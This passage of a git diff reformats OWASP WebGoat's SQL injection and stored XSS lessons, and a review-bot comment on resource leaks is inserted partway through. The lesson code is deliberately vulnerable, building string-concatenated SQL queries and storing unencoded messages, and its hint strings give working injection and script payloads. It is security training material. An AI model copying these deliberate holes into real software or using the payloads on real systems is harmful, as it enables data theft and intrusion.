category value + */ + protected Category getDefaultCategory() { - Connection connection = DatabaseUtilities.getConnection(s); + return Category.INJECTION; + } - ec.addElement(makeStationList(s)); + /** + * Gets the hints attribute of the DatabaseFieldScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command."); + hints.add("This is the code for the 
query being built and issued by WebGoat:

" + + "\"SELECT * FROM weather_data WHERE station = \" + station "); + hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " + + "Try appending a SQL statement that always resolves to true."); + hints.add("Try entering [ 101 OR 1 = 1 ]."); - String query = "SELECT * FROM weather_data WHERE station = ?"; + return hints; + } - station = s.getParser().getRawParameter(STATION_ID, null); + private final static Integer DEFAULT_RANKING = new Integer(70); - ec.addElement(new PRE(query)); + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - if (station == null) - return ec; + /** + * Gets the title attribute of the DatabaseFieldScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Numeric SQL Injection"); + } - try - { - PreparedStatement statement = connection.prepareStatement( - query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - statement.setInt(1, Integer.parseInt(station)); - ResultSet results = statement.executeQuery(); - - if ((results != null) && (results.first() == true)) + /** + * Constructor for the DatabaseFieldScreen object + * + * @param s + * Description of the Parameter + */ + public void handleRequest(WebSession s) + { + try { - ResultSetMetaData resultsMetaData = results.getMetaData(); - ec.addElement(DatabaseUtilities.writeTable(results, - resultsMetaData)); - results.last(); - - // If they get back more than one row they succeeded - if (results.getRow() > 1) - { - makeSuccess(s); - } - } - else + super.handleRequest(s); + } catch (Exception e) { - ec.addElement("No results matched. 
Try Again."); + System.out.println("Exception caught: " + e); + e.printStackTrace(System.out); } - } - catch (SQLException sqle) - { - ec.addElement(new P().addElement(sqle.getMessage())); - } - catch (NumberFormatException npe) - { - ec.addElement(new P() - .addElement("Error parsing station as a number: " - + npe.getMessage())); - } - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); } - return (ec); - } - - - protected Element makeStationList(WebSession s) throws SQLException, - ClassNotFoundException - { - ElementContainer ec = new ElementContainer(); - - ec - .addElement(new P() - .addElement("Select your local weather station: ")); - - Map stations = getStations(s); - Select select = new Select(STATION_ID); - Iterator it = stations.keySet().iterator(); - while (it.hasNext()) - { - String key = (String) it.next(); - select.addElement(new Option(key).addElement((String) stations - .get(key))); - } - ec.addElement(select); - ec.addElement(new P()); - - Element b = ECSFactory.makeButton("Go!"); - ec.addElement(b); - - return ec; - } - - - /** - * Gets the stations from the db - * - * @return A map containing each station, indexed by station number - */ - protected Map getStations(WebSession s) throws SQLException, - ClassNotFoundException - { - - Connection connection = DatabaseUtilities.getConnection(s); - - Map stations = new TreeMap(); - String query = "SELECT DISTINCT station, name FROM WEATHER_DATA"; - - try - { - Statement statement = connection.createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement.executeQuery(query); - - if ((results != null) && (results.first() == true)) - { - results.beforeFirst(); - - while (results.next()) - { - String station = results.getString("station"); - String name = results.getString("name"); - - // - if (!station.equals("10001") && !station.equals("11001")) - { - stations.put(station, name); - } - 
// - } - - results.close(); - } - } - catch (SQLException sqle) - { - sqle.printStackTrace(); - } - - return stations; - } - - - /** - * Gets the category attribute of the SqNumericInjection object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.INJECTION; - } - - - /** - * Gets the hints attribute of the DatabaseFieldScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints - .add("The application is taking your input and inserting it at the end of a pre-formed SQL command."); - hints - .add("This is the code for the query being built and issued by WebGoat:

" - + "\"SELECT * FROM weather_data WHERE station = \" + station "); - hints - .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " - + "Try appending a SQL statement that always resolves to true."); - hints.add("Try entering [ 101 OR 1 = 1 ]."); - - return hints; - } - - private final static Integer DEFAULT_RANKING = new Integer(70); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the title attribute of the DatabaseFieldScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Numeric SQL Injection"); - } - - - /** - * Constructor for the DatabaseFieldScreen object - * - * @param s Description of the Parameter - */ - public void handleRequest(WebSession s) - { - try - { - super.handleRequest(s); - } - catch (Exception e) - { - System.out.println("Exception caught: " + e); - e.printStackTrace(System.out); - } - } - } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java index 06a944cbf..3dd1fd325 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons; import java.sql.Connection; @@ -8,7 +9,6 @@ import java.sql.SQLException; import java.sql.Statement; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.html.BR; 
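Review bot: The `Statement`/`PreparedStatement` and `ResultSet` opened in `injectableQuery`, `parameterizedQuery` and `getStations` are never closed on the `SQLException` path, and `getStations` closes `results` only inside the `results.first()` branch and never closes its statement at all; since the lesson's own hint invites malformed station values, each failed request may hold a cursor open until the connection itself is discarded (whether `DatabaseUtilities.getConnection(s)` hands out pooled connections is not visible here). Wrapping each `executeQuery` in a `try { … } finally { statement.close(); }` (try-with-resources is not an option given the raw `Map`/`new Integer(70)` era of this file) would bound that cost without changing what the lesson teaches. The filter `if (!station.equals("10001") && !station.equals("11001"))` in `getStations` sits between two empty `//` lines that explain nothing; a comment such as `// stations 10001 and 11001 are deliberately left out of the drop-down — TODO confirm why` would record the intent for the next maintainer.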
@@ -19,290 +19,263 @@ import org.owasp.webgoat.session.DatabaseUtilities; import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
- *
- * @author Bruce Mayhew WebGoat
- * @created October 28, 2003
+ *
+ * @author Bruce Mayhew WebGoat
+ * @created October 28, 2003
 */
 public class SqlStringInjection extends SequentialLessonAdapter
 {
- private final static String ACCT_NAME = "account_name";
+ private final static String ACCT_NAME = "account_name";
- private static String STAGE = "stage";
+ private static String STAGE = "stage";
- private String accountName;
+ private String accountName;
-
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- return super.createStagedContent(s);
- }
-
-
- protected Element doStage1(WebSession s) throws Exception
- {
- return injectableQuery(s);
- }
-
-
- protected Element doStage2(WebSession s) throws Exception
- {
- return parameterizedQuery(s);
- }
-
-
- protected Element injectableQuery(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- try
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
+ protected Element createContent(WebSession s)
 {
- Connection connection = DatabaseUtilities.getConnection(s);
+ return super.createStagedContent(s);
+ }
- ec.addElement(makeAccountLine(s));
+ protected Element doStage1(WebSession s) throws Exception
+ {
+ return injectableQuery(s);
+ }
- String query = "SELECT * FROM user_data WHERE last_name = '"
- + accountName + "'";
- ec.addElement(new PRE(query));
+ protected Element doStage2(WebSession s) throws Exception
+ {
+ return parameterizedQuery(s);
+ }
- try
- {
- Statement statement = connection.createStatement(
- ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- ResultSet results = statement.executeQuery(query);
+ protected Element injectableQuery(WebSession s)
+ {
+ ElementContainer ec = new ElementContainer();
- if ((results != null) && (results.first() == true))
+ try
 {
- ResultSetMetaData resultsMetaData = results.getMetaData();
- ec.addElement(DatabaseUtilities.writeTable(results,
- resultsMetaData));
- results.last();
+ Connection connection = DatabaseUtilities.getConnection(s);
- // If they get back more than one user they succeeded
- if (results.getRow() >= 6)
- {
- makeSuccess(s);
- getLessonTracker(s).setStage(2);
+ ec.addElement(makeAccountLine(s));
- StringBuffer msg = new StringBuffer();
+ String query = "SELECT * FROM user_data WHERE last_name = '" + accountName + "'";
+ ec.addElement(new PRE(query));
- msg.append("Bet you can't do it again! ");
- msg
- .append("This lesson has detected your successfull attack ");
- msg.append("and has now switched to a defensive mode. ");
- msg
- .append("Try again to attack a parameterized query.");
+ try
+ {
+ Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+ ResultSet.CONCUR_READ_ONLY);
+ ResultSet results = statement.executeQuery(query);
- s.setMessage(msg.toString());
- }
- }
- else
+ if ((results != null) && (results.first() == true))
+ {
+ ResultSetMetaData resultsMetaData = results.getMetaData();
+ ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
+ results.last();
+
+ // If they get back more than one user they succeeded
+ if (results.getRow() >= 6)
+ {
+ makeSuccess(s);
+ getLessonTracker(s).setStage(2);
+
+ StringBuffer msg = new StringBuffer();
+
+ msg.append("Bet you can't do it again! ");
+ msg.append("This lesson has detected your successfull attack ");
+ msg.append("and has now switched to a defensive mode. ");
+ msg.append("Try again to attack a parameterized query.");
+
+ s.setMessage(msg.toString());
+ }
+ }
+ else
+ {
+ ec.addElement("No results matched. Try Again.");
+ }
+ } catch (SQLException sqle)
+ {
+ ec.addElement(new P().addElement(sqle.getMessage()));
+ sqle.printStackTrace();
+ }
+ } catch (Exception e)
 {
- ec.addElement("No results matched. Try Again.");
+ s.setMessage("Error generating " + this.getClass().getName());
+ e.printStackTrace();
 }
- }
- catch (SQLException sqle)
- {
- ec.addElement(new P().addElement(sqle.getMessage()));
- sqle.printStackTrace();
- }
- }
- catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
+
+ return (ec);
 }
- return (ec);
- }
-
-
- protected Element parameterizedQuery(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- ec
- .addElement("Now that you have successfully performed an SQL injection, try the same "
- + " type of attack on a parameterized query. Restart the lesson if you wish "
- + " to return to the injectable query");
- if (s.getParser().getRawParameter(ACCT_NAME, "YOUR_NAME").equals(
- "restart"))
+ protected Element parameterizedQuery(WebSession s)
 {
- getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");
- return (injectableQuery(s));
- }
+ ElementContainer ec = new ElementContainer();
- ec.addElement(new BR());
-
- try
- {
- Connection connection = DatabaseUtilities.getConnection(s);
-
- ec.addElement(makeAccountLine(s));
-
- String query = "SELECT * FROM user_data WHERE last_name = ?";
- ec.addElement(new PRE(query));
-
- try
- {
- PreparedStatement statement = connection.prepareStatement(
- query, ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- statement.setString(1, accountName);
- ResultSet results = statement.executeQuery();
-
- if ((results != null) && (results.first() == true))
+ ec.addElement("Now that you have successfully performed an SQL injection, try the same "
+ + " type of attack on a parameterized query. Restart the lesson if you wish "
+ + " to return to the injectable query");
+ if (s.getParser().getRawParameter(ACCT_NAME, "YOUR_NAME").equals("restart"))
 {
- ResultSetMetaData resultsMetaData = results.getMetaData();
- ec.addElement(DatabaseUtilities.writeTable(results,
- resultsMetaData));
- results.last();
-
- // If they get back more than one user they succeeded
- if (results.getRow() >= 6)
- {
- makeSuccess(s);
- }
+ getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");
+ return (injectableQuery(s));
 }
- else
+
+ ec.addElement(new BR());
+
+ try
 {
- ec.addElement("No results matched. Try Again.");
+ Connection connection = DatabaseUtilities.getConnection(s);
+
+ ec.addElement(makeAccountLine(s));
+
+ String query = "SELECT * FROM user_data WHERE last_name = ?";
+ ec.addElement(new PRE(query));
+
+ try
+ {
+ PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
+ ResultSet.CONCUR_READ_ONLY);
+ statement.setString(1, accountName);
+ ResultSet results = statement.executeQuery();
+
+ if ((results != null) && (results.first() == true))
+ {
+ ResultSetMetaData resultsMetaData = results.getMetaData();
+ ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
+ results.last();
+
+ // If they get back more than one user they succeeded
+ if (results.getRow() >= 6)
+ {
+ makeSuccess(s);
+ }
+ }
+ else
+ {
+ ec.addElement("No results matched. Try Again.");
+ }
+ } catch (SQLException sqle)
+ {
+ ec.addElement(new P().addElement(sqle.getMessage()));
+ }
+ } catch (Exception e)
+ {
+ s.setMessage("Error generating " + this.getClass().getName());
+ e.printStackTrace();
 }
- }
- catch (SQLException sqle)
- {
- ec.addElement(new P().addElement(sqle.getMessage()));
- }
+
+ return (ec);
 }
- catch (Exception e)
+
+ protected Element makeAccountLine(WebSession s)
 {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
+ ElementContainer ec = new ElementContainer();
+ ec.addElement(new P().addElement("Enter your last name: "));
+
+ accountName = s.getParser().getRawParameter(ACCT_NAME, "Your Name");
+ Input input = new Input(Input.TEXT, ACCT_NAME, accountName.toString());
+ ec.addElement(input);
+
+ Element b = ECSFactory.makeButton("Go!");
+ ec.addElement(b);
+
+ return ec;
+ }
- return (ec);
- }
-
-
- protected Element makeAccountLine(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- ec.addElement(new P().addElement("Enter your last name: "));
-
- accountName = s.getParser().getRawParameter(ACCT_NAME, "Your Name");
- Input input = new Input(Input.TEXT, ACCT_NAME, accountName.toString());
- ec.addElement(input);
-
- Element b = ECSFactory.makeButton("Go!");
- ec.addElement(b);
-
- return ec;
-
- }
-
-
- /**
- * Gets the category attribute of the SqNumericInjection object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
- return Category.INJECTION;
- }
-
-
- /**
- * Gets the hints attribute of the DatabaseFieldScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints
- .add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
- hints
- .add("This is the code for the query being built and issued by WebGoat:

"
- + "\"SELECT * FROM user_data WHERE last_name = \" + accountName ");
- hints
- .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR."
- + "Try appending a SQL statement that always resolves to true");
- hints.add("Try entering [ smith' OR '1' = '1 ].");
-
- return hints;
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(75);
-
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
-
- /**
- * Gets the title attribute of the DatabaseFieldScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("String SQL Injection");
- }
-
-
- /**
- * Constructor for the DatabaseFieldScreen object
- *
- * @param s Description of the Parameter
- */
- public void handleRequest(WebSession s)
- {
- try
+ /**
+ * Gets the category attribute of the SqNumericInjection object
+ *
+ * @return The category value
+ */
+ protected Category getDefaultCategory()
 {
- super.handleRequest(s);
+ return Category.INJECTION;
 }
- catch (Exception e)
+
+ /**
+ * Gets the hints attribute of the DatabaseFieldScreen object
+ *
+ * @return The hints value
+ */
+ protected List getHints(WebSession s)
 {
- System.out.println("Exception caught: " + e);
- e.printStackTrace(System.out);
+ List hints = new ArrayList();
+ hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
+ hints.add("This is the code for the query being built and issued by WebGoat:

"
+ + "\"SELECT * FROM user_data WHERE last_name = \" + accountName ");
+ hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR."
+ + "Try appending a SQL statement that always resolves to true");
+ hints.add("Try entering [ smith' OR '1' = '1 ].");
+
+ return hints;
+ }
+
+ private final static Integer DEFAULT_RANKING = new Integer(75);
+
+ protected Integer getDefaultRanking()
+ {
+ return DEFAULT_RANKING;
+ }
+
+ /**
+ * Gets the title attribute of the DatabaseFieldScreen object
+ *
+ * @return The title value
+ */
+ public String getTitle()
+ {
+ return ("String SQL Injection");
+ }
+
+ /**
+ * Constructor for the DatabaseFieldScreen object
+ *
+ * @param s
+ * Description of the Parameter
+ */
+ public void handleRequest(WebSession s)
+ {
+ try
+ {
+ super.handleRequest(s);
+ } catch (Exception e)
+ {
+ System.out.println("Exception caught: " + e);
+ e.printStackTrace(System.out);
+ }
 }
- }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java b/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java
index e67d3447c..0806da40c 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.sql.Connection;
@@ -23,358 +24,342 @@ import org.apache.ecs.html.TextArea; import org.owasp.webgoat.session.*; import org.owasp.webgoat.util.HtmlEncoder; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
- *
- * @author Jeff Williams Aspect Security
- * @created October 28, 2003
+ *
+ * @author Jeff Williams Aspect Security
+ * @created October 28, 2003
 */
 public class StoredXss extends LessonAdapter
 {
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+ public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+ .addElement(
+ new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+ .setVspace(0));
- private final static String MESSAGE = "message";
+ private final static String MESSAGE = "message";
- private final static int MESSAGE_COL = 3;
+ private final static int MESSAGE_COL = 3;
- private final static String NUMBER = "Num";
+ private final static String NUMBER = "Num";
- private final static int NUM_COL = 1;
+ private final static int NUM_COL = 1;
- private final static String STANDARD_QUERY = "SELECT * FROM messages";
+ private final static String STANDARD_QUERY = "SELECT * FROM messages";
- private final static String TITLE = "title";
+ private final static String TITLE = "title";
- private final static int TITLE_COL = 2;
+ private final static int TITLE_COL = 2;
- private static int count = 1;
+ private static int count = 1;
- private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted message
+ private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted
+ // message
-
- /**
- * Adds a feature to the Message attribute of the MessageBoardScreen object
- *
- * @param s The feature to be added to the Message attribute
- */
- protected void addMessage(WebSession s)
- {
- try
+ /**
+ * Adds a feature to the Message attribute of the MessageBoardScreen object
+ *
+ * @param s
+ * The feature to be added to the Message attribute
+ */
+ protected void addMessage(WebSession s)
 {
- String title = HtmlEncoder.encode(s.getParser().getRawParameter(
- TITLE, ""));
- String message = s.getParser().getRawParameter(MESSAGE, "");
+ try
+ {
+ String title = HtmlEncoder.encode(s.getParser().getRawParameter(TITLE, ""));
+ String message = s.getParser().getRawParameter(MESSAGE, "");
- Connection connection = DatabaseUtilities.getConnection(s);
+ Connection connection = DatabaseUtilities.getConnection(s);
- String query = "INSERT INTO messages VALUES (?, ?, ?, ? )";
+ String query = "INSERT INTO messages VALUES (?, ?, ?, ? )";
- PreparedStatement statement = connection.prepareStatement(query,
- ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- statement.setInt(1, count++);
- statement.setString(2, title);
- statement.setString(3, message);
- statement.setString(4, s.getUserName());
- statement.execute();
+ PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
+ ResultSet.CONCUR_READ_ONLY);
+ statement.setInt(1, count++);
+ statement.setString(2, title);
+ statement.setString(3, message);
+ statement.setString(4, s.getUserName());
+ statement.execute();
+ } catch (Exception e)
+ {
+ // ignore the empty resultset on the insert. There are a few more SQL Injection errors
+ // that could be trapped here but we will let them try. One error would be something
+ // like "Characters found after end of SQL statement."
+ if (e.getMessage().indexOf("No ResultSet was produced") == -1)
+ {
+ s.setMessage("Could not add message to database");
+ }
+ e.printStackTrace();
+ }
 }
- catch (Exception e)
+
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
+ protected Element createContent(WebSession s)
 {
- // ignore the empty resultset on the insert. There are a few more SQL Injection errors
- // that could be trapped here but we will let them try. One error would be something
- // like "Characters found after end of SQL statement."
- if (e.getMessage().indexOf("No ResultSet was produced") == -1)
- {
- s.setMessage("Could not add message to database");
- }
- e.printStackTrace();
+ addMessage(s);
+
+ ElementContainer ec = new ElementContainer();
+ ec.addElement(makeInput(s));
+ ec.addElement(new HR());
+ ec.addElement(makeCurrent(s));
+ ec.addElement(new HR());
+ ec.addElement(makeList(s));
+
+ return (ec);
 }
- }
-
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- addMessage(s);
-
- ElementContainer ec = new ElementContainer();
- ec.addElement(makeInput(s));
- ec.addElement(new HR());
- ec.addElement(makeCurrent(s));
- ec.addElement(new HR());
- ec.addElement(makeList(s));
-
- return (ec);
- }
-
-
- /**
- * Gets the category attribute of the StoredXss object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
- return Category.XSS;
- }
-
-
- /**
- * Gets the hints attribute of the MessageBoardScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("You can put HTML tags in your message.");
- hints
- .add("Bury a SCRIPT tag in the message to attack anyone who reads it.");
- hints
- .add("Enter this: <script language=\"javascript\" type=\"text/javascript\">alert(\"Ha Ha Ha\");</script> in the message field.");
- hints
- .add("Enter this: <script>alert(\"document.cookie\");</script> in the message field.");
-
- return hints;
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(100);
-
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
-
- /**
- * Gets the title attribute of the MessageBoardScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Stored XSS Attacks");
- }
-
-
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element makeCurrent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- try
+ /**
+ * Gets the category attribute of the StoredXss object
+ *
+ * @return The category value
+ */
+ protected Category getDefaultCategory()
 {
- int messageNum = s.getParser().getIntParameter(NUMBER, 0);
+ return Category.XSS;
+ }
- Connection connection = DatabaseUtilities.getConnection(s);
+ /**
+ * Gets the hints attribute of the MessageBoardScreen object
+ *
+ * @return The hints value
+ */
+ protected List getHints(WebSession s)
+ {
+ List hints = new ArrayList();
+ hints.add("You can put HTML tags in your message.");
+ hints.add("Bury a SCRIPT tag in the message to attack anyone who reads it.");
+ hints
+ .add("Enter this: <script language=\"javascript\" type=\"text/javascript\">alert(\"Ha Ha Ha\");</script> in the message field.");
+ hints.add("Enter this: <script>alert(\"document.cookie\");</script> in the message field.");
- // edit by Chuck Willis - Added logic to associate similar usernames
- // The idea is that users chuck-1, chuck-2, etc will see each other's messages
- // but not anyone elses. This allows users to try out XSS to grab another user's
- // cookies, but not get confused by other users scripts
+ return hints;
+ }
- String query = "SELECT * FROM messages WHERE user_name LIKE ? and num = ?";
- PreparedStatement statement = connection.prepareStatement(query,
- ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- statement.setString(1, getNameroot(s.getUserName()) + "%");
- statement.setInt(2, messageNum);
- ResultSet results = statement.executeQuery();
+ private final static Integer DEFAULT_RANKING = new Integer(100);
- if ((results != null) && results.first())
- {
- ec.addElement(new H1("Message Contents For: "
- + results.getString(TITLE_COL)));
- Table t = new Table(0).setCellSpacing(0).setCellPadding(0)
- .setBorder(0);
- TR row1 = new TR(new TD(new B(new StringElement("Title:"))));
- row1.addElement(new TD(new StringElement(results
- .getString(TITLE_COL))));
+ protected Integer getDefaultRanking()
+ {
+ return DEFAULT_RANKING;
+ }
+
+ /**
+ * Gets the title attribute of the MessageBoardScreen object
+ *
+ * @return The title value
+ */
+ public String getTitle()
+ {
+ return ("Stored XSS Attacks");
+ }
+
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
+ protected Element makeCurrent(WebSession s)
+ {
+ ElementContainer ec = new ElementContainer();
+
+ try
+ {
+ int messageNum = s.getParser().getIntParameter(NUMBER, 0);
+
+ Connection connection = DatabaseUtilities.getConnection(s);
+
+ // edit by Chuck Willis - Added logic to associate similar usernames
+ // The idea is that users chuck-1, chuck-2, etc will see each other's messages
+ // but not anyone elses. This allows users to try out XSS to grab another user's
+ // cookies, but not get confused by other users scripts
+
+ String query = "SELECT * FROM messages WHERE user_name LIKE ? and num = ?";
+ PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
+ ResultSet.CONCUR_READ_ONLY);
+ statement.setString(1, getNameroot(s.getUserName()) + "%");
+ statement.setInt(2, messageNum);
+ ResultSet results = statement.executeQuery();
+
+ if ((results != null) && results.first())
+ {
+ ec.addElement(new H1("Message Contents For: " + results.getString(TITLE_COL)));
+ Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+ TR row1 = new TR(new TD(new B(new StringElement("Title:"))));
+ row1.addElement(new TD(new StringElement(results.getString(TITLE_COL))));
+ t.addElement(row1);
+
+ String messageData = results.getString(MESSAGE_COL);
+ TR row2 = new TR(new TD(new B(new StringElement("Message:"))));
+ row2.addElement(new TD(new StringElement(messageData)));
+ t.addElement(row2);
+
+ // Edited by Chuck Willis - added display of the user who posted the message, so
+ // that
+ // if users use a cross site request forgery or XSS to make another user post a
+ // message,
+ // they can see that the message is attributed to that user
+
+ TR row3 = new TR(new TD(new StringElement("Posted By:")));
+ row3.addElement(new TD(new StringElement(results.getString(USER_COL))));
+ t.addElement(row3);
+
+ ec.addElement(t);
+
+ // Some sanity checks that the script may be correct
+ if (messageData.toLowerCase().indexOf("") != -1
+ && messageData.toLowerCase().indexOf("alert") != -1)
+ {
+ makeSuccess(s);
+ }
+
+ }
+ else
+ {
+ if (messageNum != 0)
+ {
+ ec.addElement(new P().addElement("Could not find message " + messageNum));
+ }
+ }
+ } catch (Exception e)
+ {
+ s.setMessage("Error generating " + this.getClass().getName());
+ e.printStackTrace();
+ }
+
+ return (ec);
+ }
+
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
+ protected Element makeInput(WebSession s)
+ {
+ Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+ TR row1 = new TR();
+ TR row2 = new TR();
+ row1.addElement(new TD(new StringElement("Title: ")));
+
+ Input inputTitle = new Input(Input.TEXT, TITLE, "");
+ row1.addElement(new TD(inputTitle));
+
+ TD item1 = new TD();
+ item1.setVAlign("TOP");
+ item1.addElement(new StringElement("Message: "));
+ row2.addElement(item1);
+
+ TD item2 = new TD();
